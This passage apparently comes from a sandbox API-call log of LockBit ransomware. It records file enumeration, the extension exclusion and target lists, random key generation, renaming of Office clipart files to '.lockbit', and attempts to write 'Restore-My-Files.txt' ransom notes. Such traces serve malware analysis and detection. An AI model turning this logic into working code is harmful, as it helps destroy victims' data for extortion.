hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0159.282] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0159.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.288] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.288] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.289] free (_Block=0x1fa2ed8) [0159.289] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.289] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.289] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.289] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x49ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341742.JPG", cAlternateFileName="")) returned 1 [0159.289] lstrcmpiW (lpString1=".", lpString2="J0341742.JPG") returned -1 [0159.290] lstrcmpiW (lpString1="..", lpString2="J0341742.JPG") returned -1 [0159.290] PathFindExtensionW (pszPath="J0341742.JPG") returned=".JPG" [0159.290] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.290] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.290] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.291] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.291] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.292] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.292] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.292] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.292] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.292] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.292] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341742.JPG") returned 1 [0159.292] lstrcmpiW (lpString1="ntldr", lpString2="J0341742.JPG") returned 1 [0159.292] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341742.JPG") returned 1 [0159.292] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341742.JPG") returned -1 [0159.292] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341742.JPG") returned -1 [0159.292] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341742.JPG") returned 1 [0159.292] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341742.JPG") returned -1 [0159.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG") returned=".JPG" [0159.293] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.293] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.293] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.293] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.293] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.293] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.293] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.294] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.294] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG.lockbit") returned 72 [0159.294] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341742.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.300] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.300] malloc (_Size=0x40068) returned 0x3d70450 [0159.300] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=18874) returned 1 [0159.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.302] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.302] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.334] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.334] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.334] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.335] free (_Block=0x1fa2ed8) [0159.335] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.335] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.335] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.336] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10bdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382836.JPG", cAlternateFileName="")) returned 1 [0159.336] lstrcmpiW (lpString1=".", lpString2="J0382836.JPG") returned -1 [0159.336] lstrcmpiW (lpString1="..", lpString2="J0382836.JPG") returned -1 [0159.336] PathFindExtensionW (pszPath="J0382836.JPG") returned=".JPG" [0159.336] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.336] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.336] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.336] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.336] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.337] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.337] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.338] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.338] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382836.JPG") returned 1 [0159.338] lstrcmpiW (lpString1="ntldr", lpString2="J0382836.JPG") returned 1 [0159.338] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382836.JPG") returned 1 [0159.338] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382836.JPG") returned -1 [0159.338] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382836.JPG") returned -1 [0159.338] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382836.JPG") returned 1 [0159.338] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382836.JPG") returned -1 [0159.338] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.339] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG") returned=".JPG" [0159.339] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.339] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.339] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.340] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.340] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG.lockbit") returned 72 [0159.340] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382836.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0159.341] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.341] malloc (_Size=0x40068) returned 0x3df0008 [0159.341] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=68572) returned 1 [0159.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0159.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0159.343] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.347] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.347] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.348] free (_Block=0x1fa2ed8) [0159.349] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.349] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.349] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ce5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382925.JPG", cAlternateFileName="")) returned 1 [0159.349] lstrcmpiW (lpString1=".", lpString2="J0382925.JPG") returned -1 [0159.349] lstrcmpiW (lpString1="..", lpString2="J0382925.JPG") returned -1 [0159.349] PathFindExtensionW (pszPath="J0382925.JPG") returned=".JPG" [0159.349] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.349] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.349] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.349] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.349] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.349] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.350] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.350] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.351] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.351] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382925.JPG") returned 1 [0159.351] lstrcmpiW (lpString1="ntldr", lpString2="J0382925.JPG") returned 1 [0159.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382925.JPG") returned 1 [0159.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382925.JPG") returned -1 [0159.351] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382925.JPG") returned -1 [0159.351] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382925.JPG") returned 1 [0159.351] lstrcmpiW 